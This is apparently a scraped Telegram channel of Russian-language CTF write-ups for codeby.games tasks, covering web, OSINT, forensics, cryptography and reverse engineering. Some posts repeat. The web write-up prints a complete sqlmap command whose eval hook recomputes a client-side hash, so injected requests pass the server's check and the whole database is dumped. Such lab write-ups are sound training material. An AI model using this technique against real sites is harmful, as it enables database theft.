#WEB Игровой автомат от @w0ltage
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
Зная это, дружим sqlmap с генерацией хэша через
*переменная
Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
🚩 https://codeby.games
#codebygames
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLiВ POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
result=944&hash=6bed8834f12ba1043159b2cd5f846708
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
md5(sha256(sha1(sha256(sha1(result)))))
Зная это, дружим sqlmap с генерацией хэша через
--eval и дампим БДsqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all*переменная
result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🖕3👍2
#OSINT Код Да Винчи от @Zer0_Tw0_02
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом
Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.
🚩 https://codeby.games
#codebygames
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом
Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Друзья! Всем доброе утро.
Выкладываем ВСЕ по #WEB от @ishanyam
Ссылка на райтапы, которые прекрасно организованы в статьи
https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam
PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим
🚩 https://codeby.games
#codebygames
Выкладываем ВСЕ по #WEB от @ishanyam
Ссылка на райтапы, которые прекрасно организованы в статьи
https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam
PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩8🤔3🔥1
Forwarded from Artyom
Игровой автомат
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
Зная это, дружим sqlmap с генерацией хэша через
*переменная
Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLiВ POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
result=944&hash=6bed8834f12ba1043159b2cd5f846708
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
md5(sha256(sha1(sha256(sha1(result)))))
Зная это, дружим sqlmap с генерацией хэша через
--eval и дампим БДsqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all*переменная
result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
👍5😐2❤1
#Форензика Гул земли 2 от @synberg
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
🚩 https://codeby.games
#codebygames
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👏5❤1
#Криптография от @andreika47
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
🚩 https://codeby.games
#codebygames
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
www.dcode.fr
Hill Cipher
Tool to decrypt/encrypt with Hill cipher, a ciphering system similar to affine cipher but using a coefficient matrix instead of 2 affine coefficients (gradient).
👍8❤1
Forwarded from suzu
🔥7❤1
#Реверс Лазанья от @sad_frogy
Открываем в DIE, видим PyInstaller. Находим утилиту https://pyinstxtractor-web.netlify.app, вытаскиваем из exe исходники.
Там находим файл lasagna.pyc. Его декомпилируем (https://www.toolnb.com/tools-lang-en/pyc.html), получаем исходный код.
Видим полностью алгоритм шифрования (Caesar -> base64 -> XOR -> AES), делаем в обратном порядке к переменной в этом файле. Все необходимые ключи к шифрам находятся прямо в коде.
🚩 https://codeby.games
#codebygames
Открываем в DIE, видим PyInstaller. Находим утилиту https://pyinstxtractor-web.netlify.app, вытаскиваем из exe исходники.
Там находим файл lasagna.pyc. Его декомпилируем (https://www.toolnb.com/tools-lang-en/pyc.html), получаем исходный код.
Видим полностью алгоритм шифрования (Caesar -> base64 -> XOR -> AES), делаем в обратном порядке к переменной в этом файле. Все необходимые ключи к шифрам находятся прямо в коде.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
Toolnb
PyC decompile - Toolnb online toolbox
PyC decompile, python decompile
🔥8
Мы опубликовали почти все что нам прислали!
Если у вас есть райтапы, которыми вы можете поделиться присылайте в личку @freenameruuuu и @coffeedipso
Плюс в карму вам обеспечен!
Если у вас есть райтапы, которыми вы можете поделиться присылайте в личку @freenameruuuu и @coffeedipso
Плюс в карму вам обеспечен!
❤4